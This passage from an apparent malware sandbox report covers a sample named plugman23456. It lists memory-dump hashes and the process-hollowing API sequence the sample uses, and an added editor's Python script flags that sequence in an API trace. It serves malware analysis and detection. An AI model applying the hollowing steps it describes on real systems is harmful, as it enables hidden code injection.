                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 994ae166bcce9e742bc1a12e22807ee63e4353cea3e70693010be08ac6c301d3
                          • Instruction ID: a99d8982d693c4162f6937b4e0db9f84c4877235a6cb3966311d340a57e473f2
                          • Opcode Fuzzy Hash: 994ae166bcce9e742bc1a12e22807ee63e4353cea3e70693010be08ac6c301d3
                          • Instruction Fuzzy Hash: 4921EB74809214CFCB24CF64D9447F8BBB9AB4E315F14919AC44EA7292E7319B86EF14
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 76c6570100e720f435e0ae6339e6080433b05a057272fe4dc3744d2e7df7befb
                          • Instruction ID: eb0d6fa999e19150a3f593c4f6ee56815412148aa9f7cb07511c49b729027d6d
                          • Opcode Fuzzy Hash: 76c6570100e720f435e0ae6339e6080433b05a057272fe4dc3744d2e7df7befb
                          • Instruction Fuzzy Hash: 6D213074909254CFCB14CF64D9547F8BBF9AB0E311F1490DA848EA7292E7349A86DF14
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ce90180640d19a26133d018e1844afc9498bfde7b2975be5468386c5cb46430d
                          • Instruction ID: 258f6bff9824e16504108688c940022629855541a477932d43f2ad4e0e673614
                          • Opcode Fuzzy Hash: ce90180640d19a26133d018e1844afc9498bfde7b2975be5468386c5cb46430d
                          • Instruction Fuzzy Hash: 5711FB74809218CFCB24CF64D9447E8BBF9AB0E311F14919A848EA72A1E7309FC5EF54
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0a4836f21f403bb5f3a8d28275851845e877d5fa2816726b41886a143ecd5f9a
                          • Instruction ID: 73b794ebb4ef94cdd1556fd12d1ca2bf3cea374adbd2035b4602400e0c95d4a4
                          • Opcode Fuzzy Hash: 0a4836f21f403bb5f3a8d28275851845e877d5fa2816726b41886a143ecd5f9a
                          • Instruction Fuzzy Hash: A601807580E395CFCB11CB74D8542E87FF86B0B315F1491DAC48E962A2E7349A89EF21
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9817edef21b367eeb325e2598853b1b29d989c4a5b4f9819225695b7e72d2041
                          • Instruction ID: 39e509d79503823d2cb0a2689137169ffe96b10ae650fd482377aa0aebb04bd4
                          • Opcode Fuzzy Hash: 9817edef21b367eeb325e2598853b1b29d989c4a5b4f9819225695b7e72d2041
                          • Instruction Fuzzy Hash: 8DF01275C0D215CFCB14CF64D8546F877F9AB0E305F14A0A6C08E92261E7349A99EF64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bfa2c-1bfe87, CreateProcessA called from block 1bfc24-1bfd1b
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001BFCFF
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: b816742a5680359fbceb4a05de559eedf855a514b0ecd2dac051fc28f6e2c8a1
                          • Instruction ID: 34ab025b4ef33a21fc3da1abcefddd8d103178b4e487d2cb8a7b37fe484d9449
                          • Opcode Fuzzy Hash: b816742a5680359fbceb4a05de559eedf855a514b0ecd2dac051fc28f6e2c8a1
                          • Instruction Fuzzy Hash: 0DC11371D002198FDF24CFA8CD55BEEBBB1BB09304F1091AAD819B7250DB749A86CF95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bfa38-1bfe87, CreateProcessA called from block 1bfc24-1bfd1b
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001BFCFF
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: fe9eca4627647595239d103aa25c944054a81ecea77617624fc9950a3a0cf193
                          • Instruction ID: 34901d902f176a0a0c9471d3a52352c2ea8fcc29c11e81fc30c7f20657bb0e40
                          • Opcode Fuzzy Hash: fe9eca4627647595239d103aa25c944054a81ecea77617624fc9950a3a0cf193
                          • Instruction Fuzzy Hash: 2BC11471D002198FDF24CFA8CD55BEDBBB1BB09300F0095AAD819B7250DB749A86CF95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bf698-1bf7e4, WriteProcessMemory called from block 1bf722-1bf789
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001BF773
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: d1d75392aa73e9e8d790bf93522c2bc4ad3a8ed0c23285c433f47cd1aa5595f8
                          • Instruction ID: 269c3c9f3dcba19ffa926dc65369121fa8b52d0aa16fbf07ea221cc22302aa62
                          • Opcode Fuzzy Hash: d1d75392aa73e9e8d790bf93522c2bc4ad3a8ed0c23285c433f47cd1aa5595f8
                          • Instruction Fuzzy Hash: 5C41BBB5D012589FCF00CFA9D984AEEFBF1BB49314F20902AE818B7250D734AA45CF64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bf6a0-1bf7e4, WriteProcessMemory called from block 1bf722-1bf789
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001BF773
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: ea2aae321c7381a8834c0f6baea6fba75cb4ffbb700d7d44deaf7d0ba08cfa00
                          • Instruction ID: e8ad01f95331f837b27d71b6f98d0fdbd1c8219ed5221d9ced23019ce8490bf3
                          • Opcode Fuzzy Hash: ea2aae321c7381a8834c0f6baea6fba75cb4ffbb700d7d44deaf7d0ba08cfa00
                          • Instruction Fuzzy Hash: CC41AAB5D002589FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D775AA45CF64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bf7f9-1bf923, ReadProcessMemory called from block 1bf7f9-1bf8c8
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001BF8B2
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 9b23acb2e3e70e46aa3e5ddea8c2d6fdf3b22bc1557fe6bac97207bd99342c1c
                          • Instruction ID: 09dfc3d78dc4ac4cdcd05f8c0a2463c035ead69ebe99b05f9f7d7e7c55e80bfc
                          • Opcode Fuzzy Hash: 9b23acb2e3e70e46aa3e5ddea8c2d6fdf3b22bc1557fe6bac97207bd99342c1c
                          • Instruction Fuzzy Hash: 4641C9B9D042589FCF10CFA9D984AEEFBB1BF49310F20942AE815B7250C735A946CF64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bf800-1bf923, ReadProcessMemory called from block 1bf800-1bf8c8
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001BF8B2
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 719783f6ea0345c10ffb8d94040b829600bf4f40f6431e13b376ef1ff97501d3
                          • Instruction ID: c6309cc23e42b35bc108d28b0cecbea8708c6b6f0ad5bf44c4618fedadab9cd0
                          • Opcode Fuzzy Hash: 719783f6ea0345c10ffb8d94040b829600bf4f40f6431e13b376ef1ff97501d3
                          • Instruction Fuzzy Hash: 8941BAB5D002589FCF10CFAAD984AEEFBB1BF49310F20942AE814B7200D735A946CF64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bf571-1bf68b, VirtualAllocEx called from block 1bf571-1bf638
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001BF622
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: d68e5ca511b2b1b9f1f011de61b17544f353e67a75fcff97847ef61b94ab0f5c
                          • Instruction ID: f0fbafc8418d1603fe5791c66e9839ba62506b71b1ab991a31994497cdaa4f6e
                          • Opcode Fuzzy Hash: d68e5ca511b2b1b9f1f011de61b17544f353e67a75fcff97847ef61b94ab0f5c
                          • Instruction Fuzzy Hash: 4C41AAB9D002489FCF10CFA9D984AEEFBB1BB49310F20942AE815B7314D735A906CF55

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bf578-1bf68b, VirtualAllocEx called from block 1bf578-1bf638
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001BF622
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: e40e66e5712bd29ca543aea5977d38026e4cf7a089aabf4e13d94a2d15cf1303
                          • Instruction ID: 2a1b35f7609d60f46dd20892a6fd0e97b5471fbc9e4f123bd81a4d9c8077c1dc
                          • Opcode Fuzzy Hash: e40e66e5712bd29ca543aea5977d38026e4cf7a089aabf4e13d94a2d15cf1303
                          • Instruction Fuzzy Hash: A84199B9D002589FCF10CFA9D984AEEFBB1BB49310F20942AE815B7314D735A946CF65

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bf441-1bf562, Wow64SetThreadContext called from block 1bf4bf-1bf50d
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 001BF4F7
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: f0b9dd48f1201e9110e37edf1c3e647d3f1578da5fb41e6e25d9c1acc480eff8
                          • Instruction ID: d9b746fb4bfc9cd9459272fe304acece53755c77a84fe4bbd251e14032b428ed
                          • Opcode Fuzzy Hash: f0b9dd48f1201e9110e37edf1c3e647d3f1578da5fb41e6e25d9c1acc480eff8
                          • Instruction Fuzzy Hash: ED41BFB5D002589FCF10CFA9D984AEEFFB1AF49314F24842AE419B7244C778A949CF54

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph (rendered graph; basic-block edge list omitted): function 1bf448-1bf562, Wow64SetThreadContext called from block 1bf4bf-1bf50d
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 001BF4F7
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 7f1e40a863f393705ad1714055f243c6cfa9c8e145a48f0fdd6b9a1fd002f602
                          • Instruction ID: f0fd1ba12aa92eb35ac770236f27287a431478f911c74c5ac5b74c5ca904bc77
                          • Opcode Fuzzy Hash: 7f1e40a863f393705ad1714055f243c6cfa9c8e145a48f0fdd6b9a1fd002f602
                          • Instruction Fuzzy Hash: B741AEB5D002589FCF10CFAAD984AEEFBB1BF49314F24842AE418B7244D779AA45CF54

                          Control-flow Graph (rendered graph not reproduced; basic blocks and edges as extracted)

                          • 1bf350-1bf3ec (calls ResumeThread) -> 1bf3ee-1bf3f4, 1bf3f5-1bf437
                          • 1bf3ee-1bf3f4 -> 1bf3f5-1bf437
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 001BF3D6
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 0839a778149e1f78ab74e82f956fd328428c1e4cf0f42b05471335372ba0e53e
                          • Instruction ID: 40ebb4a09e774e8cac9151e81655e87d6d408097891d98bafac7bef3e3e49879
                          • Opcode Fuzzy Hash: 0839a778149e1f78ab74e82f956fd328428c1e4cf0f42b05471335372ba0e53e
                          • Instruction Fuzzy Hash: 5831D9B4D002189FCF10CFAAD984AEEFBB5BB49314F24942AE814B7310D775A906CF94
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 001BF3D6
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: d67c0478e97ac2d723e193dad26d6e41bdfa4bb03709962bb04393b7662d17cb
                          • Instruction ID: ece6366a8573586b4a1b64c7779ddf3996dc8f8b736325dad25fe199e6093956
                          • Opcode Fuzzy Hash: d67c0478e97ac2d723e193dad26d6e41bdfa4bb03709962bb04393b7662d17cb
                          • Instruction Fuzzy Hash: 3931B9B4D002189FCF14CFAAD984AEEFBB5BB49314F24942AE814B7310D775A906CF94
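                          The entries above place a Wow64SetThreadContext call (ref 001BF4F7) and a ResumeThread call (ref 001BF3D6) in the same 001B0000 dump of process 5. A context write on a suspended thread followed by a resume of that thread is the final step of process hollowing: the new entry point is planted in the thread context and the thread is released. The script below is an added example by the editor, not Joe Sandbox output and not code from the sample. It scans a flat API trace for that pair, matches the two calls on the thread handle, and records whether a cross-process memory write preceded them. The trace lines, process ids and handle values are constructed; the preamble calls listed in WRITERS are the usual lead-up to this technique and are an assumption, since this page records only the last two calls.

```python
"""Flag the thread-context-write -> ResumeThread tail of process hollowing in an API trace.

Editor's added example; not Joe Sandbox output and not code from the sample.
Trace lines mirror the report's "Api.Module(args), ref: addr" shape, prefixed
with a process id. All handle values and the lines for pids 7 and 9 are constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

CONTEXT_SETTERS = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
RESUMERS = {"ResumeThread", "NtResumeThread"}
# Usual hollowing preamble (assumed; this page records only the last two calls).
WRITERS = {"NtUnmapViewOfSection", "VirtualAllocEx", "WriteProcessMemory", "NtWriteVirtualMemory"}

LINE_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    pid: int
    api: str
    module: str
    args: List[str]
    ref: str


@dataclass
class Hit:
    pid: int
    setter: Call
    resumer: Call
    handle: Optional[str]   # thread handle when both calls exposed the same one, else None
    wrote_memory: bool      # a WRITERS call preceded the pair in the same pid

    @property
    def confidence(self) -> str:
        if self.handle is not None and self.wrote_memory:
            return "high"
        return "medium" if (self.handle is not None or self.wrote_memory) else "low"


def parse_trace(lines: Iterable[str]) -> List[Call]:
    calls = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable trace line: {line!r}")
        args = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
        calls.append(Call(int(m["pid"]), m["api"], m["module"], args, m["ref"]))
    return calls


def _handle(call: Call) -> Optional[str]:
    # The thread handle is the first argument of both the Win32 and Nt variants;
    # the sandbox prints '?' where it could not resolve a value (as on this page).
    if call.args and call.args[0] != "?":
        return call.args[0]
    return None


def find_hollowing_tails(calls: List[Call], window: int = 8) -> List[Hit]:
    """Pair each context write with the next resume of the same thread in the same pid."""
    hits = []
    for i, setter in enumerate(calls):
        if setter.api not in CONTEXT_SETTERS:
            continue
        h_set = _handle(setter)
        for resumer in calls[i + 1:i + 1 + window]:
            if resumer.pid != setter.pid or resumer.api not in RESUMERS:
                continue
            h_res = _handle(resumer)
            if h_set is not None and h_res is not None and h_set != h_res:
                continue  # a different thread was resumed; keep looking
            wrote = any(c.pid == setter.pid and c.api in WRITERS
                        for c in calls[max(0, i - window):i])
            hits.append(Hit(setter.pid, setter, resumer, h_set if h_set == h_res else None, wrote))
            break
    return hits


# Constructed trace: pid 5 reuses the two refs from this report with invented handles,
# pid 7 is a debugger-like pair with no memory write, pid 9 has unresolved handles.
SAMPLE_TRACE = """
5 NtUnmapViewOfSection.NTDLL(000001A0,00400000), ref: 001BF300
5 VirtualAllocEx.KERNEL32(000001A0,00400000,00025000,00003000,00000040), ref: 001BF330
5 WriteProcessMemory.KERNEL32(000001A0,00400000,?,00000400,?), ref: 001BF380
5 Wow64GetThreadContext.KERNEL32(000001A4,?), ref: 001BF4C0
5 Wow64SetThreadContext.KERNEL32(000001A4,?), ref: 001BF4F7
5 ResumeThread.KERNELBASE(000001A4), ref: 001BF3D6
7 GetThreadContext.KERNEL32(000000F8,?), ref: 00401000
7 SetThreadContext.KERNEL32(000000F8,?), ref: 00401020
7 ResumeThread.KERNEL32(000000F8), ref: 00401040
9 Wow64SetThreadContext.KERNEL32(?,?), ref: 00402000
9 ResumeThread.KERNELBASE(?), ref: 00402010
"""

if __name__ == "__main__":
    for hit in find_hollowing_tails(parse_trace(SAMPLE_TRACE.splitlines())):
        print(f"pid {hit.pid}: {hit.setter.api}@{hit.setter.ref} -> {hit.resumer.api}@{hit.resumer.ref} "
              f"handle={hit.handle} wrote_memory={hit.wrote_memory} confidence={hit.confidence}")
```

                          The handle match is what separates a hollowing tail from a debugger or profiler that also sets and resumes thread contexts; when the sandbox could not resolve the handles, as the `(?,?)` arguments on this page show, the pair is still reported but at low confidence, and the presence of a preceding cross-process write is what raises it.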
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: }(l
                          • API String ID: 0-2730413756
                          • Opcode ID: c2882f6cf2ef8b44501c31f50598697ebdd81a409b2a9c8fc5f634e35f213035
                          • Instruction ID: e7dabafd9c9b4122ee1bc9f1ba8868ef037995e4c0eb23acfbd36c9faff00585
                          • Opcode Fuzzy Hash: c2882f6cf2ef8b44501c31f50598697ebdd81a409b2a9c8fc5f634e35f213035
                          • Instruction Fuzzy Hash: F221A374E003188FDB14DFA4C855AADBBB2EF8A301F208129D8196B395DB355D42CF51
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: d/p
                          • API String ID: 0-541466032
                          • Opcode ID: 422a6f37de5a05fffabed60224b78f5f9684d3e7d907bd8fe1c1f6087e147fd8
                          • Instruction ID: d2f6cbb0e865c6f61216f6b0740569d61c3d5dd500a3f8bfc0b7829a07e7a501
                          • Opcode Fuzzy Hash: 422a6f37de5a05fffabed60224b78f5f9684d3e7d907bd8fe1c1f6087e147fd8
                          • Instruction Fuzzy Hash: 9201BC78845248EFCF06DFE8D810AADBF75EB46300F04829AEC4467260D7350A55EF61
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: (
                          • API String ID: 0-3887548279
                          • Opcode ID: e2b26a8af82421337a6ef27f682b6af5c22c7adb96dff31a2fdbdcc9cd1306d0
                          • Instruction ID: da37efa98c91292d8d831be31f6c4ed2645c5158c7eaae9f20d43d52f7bc7dfc
                          • Opcode Fuzzy Hash: e2b26a8af82421337a6ef27f682b6af5c22c7adb96dff31a2fdbdcc9cd1306d0
                          • Instruction Fuzzy Hash: 0111607590A2289FDB60CF58C980BE8B7B9BB49315F1090D9D44EA6242D7359B85EF10
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e4afb3f67eadf12a6d86aba29a8244930cacac5620f0061cfb6ec7c85cf5e4d
                          • Instruction ID: 3910db15e5a76f6f33092d62e54da78710047a502308204d21d3a4ae9517bf60
                          • Opcode Fuzzy Hash: 7e4afb3f67eadf12a6d86aba29a8244930cacac5620f0061cfb6ec7c85cf5e4d
                          • Instruction Fuzzy Hash: F0E04FA084B2846ED716C664AC21EBE7F389B83204B1541CBD88486192D6A10A05EB72
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ddae0f6202564eff2ddbafcb0735bada52a532309c3f6a20aed38f5e811c4887
                          • Instruction ID: e31190f84d191ff5a4ac952d5647a54bd978799305ea03d4b934c36ef6284bc2
                          • Opcode Fuzzy Hash: ddae0f6202564eff2ddbafcb0735bada52a532309c3f6a20aed38f5e811c4887
                          • Instruction Fuzzy Hash: 0C413A7490A219CFCB14CFA4E8487ECBBF5BB4A305F20A066D44EA7295E7348985DF24
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7d3858567454da7573be427b0e1071766470660c9156fa1021df717c999b5455
                          • Instruction ID: 3aad6ed6726c0ea860d21c570753ca9f93e9972066c0732546a78080429bae1e
                          • Opcode Fuzzy Hash: 7d3858567454da7573be427b0e1071766470660c9156fa1021df717c999b5455
                          • Instruction Fuzzy Hash: 4931E675D4A208CFDB00CFA8D4946FDBFF8AB0A310F28A119D54EA7282E7749941DF64
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd7790c23a12a4634ccad56772451e9e83cf491f797f67c8a82042fd11d624d3
                          • Instruction ID: d30e4bf5a299cbd10dc1907127171135eee07b5b5550fc0f9ba602028922ed76
                          • Opcode Fuzzy Hash: fd7790c23a12a4634ccad56772451e9e83cf491f797f67c8a82042fd11d624d3
                          • Instruction Fuzzy Hash: 8531F775909218CFDB24CF54C884BEDBBB5AB4A305F2490DAD44DAB292E7319B85EF10
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e95450d944b48dff166cb3f812b899493fa40d42bf3be30afe0b0f0de805ff3
                          • Instruction ID: e4edad84409d5c46e3d46ad8b0e708be03a2cc2d4fd7a79e245137dc636003ee
                          • Opcode Fuzzy Hash: 3e95450d944b48dff166cb3f812b899493fa40d42bf3be30afe0b0f0de805ff3
                          • Instruction Fuzzy Hash: 39119038D052089BDB04CFE9D8546EDFBB6AB8E311F14A129D909BB291D7714805CB24
                          Memory Dump Source
                          • Source File: 00000005.00000002.377420036.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_16d000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ffe8962890f7812caf46fe3c5fae04a616390221a0c7ca249bf947d2a7967d87
                          • Instruction ID: edeaa936adcd964ca4f2a2f908b4e42476c67e96e4b020e8a94ae4133bf398c2
                          • Opcode Fuzzy Hash: ffe8962890f7812caf46fe3c5fae04a616390221a0c7ca249bf947d2a7967d87
                          • Instruction Fuzzy Hash: 9421C2B5A04240EFDB15CF14E9D0B26BBA5FB84314F24C5ADE8494B256C336D85ACB61
                          Memory Dump Source
                          • Source File: 00000005.00000002.377420036.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_16d000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ec48475966cffbcf21af511b4325280f7d5b206b0ccca5130688f379eaa7013
                          • Instruction ID: 7ad5fba05698fcee117c6953e84f88897ffb6b7fcfa625bd8efb3d14e5eee82a
                          • Opcode Fuzzy Hash: 0ec48475966cffbcf21af511b4325280f7d5b206b0ccca5130688f379eaa7013
                          • Instruction Fuzzy Hash: 1521B075A04240EFDB15CF14E884B26BB65EB84314F34C5A9E8494B246C736D857CBA1
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9e4e1714beeeddd2ce99f636a43ed349f1deb9216170d71fa55912c705646f73
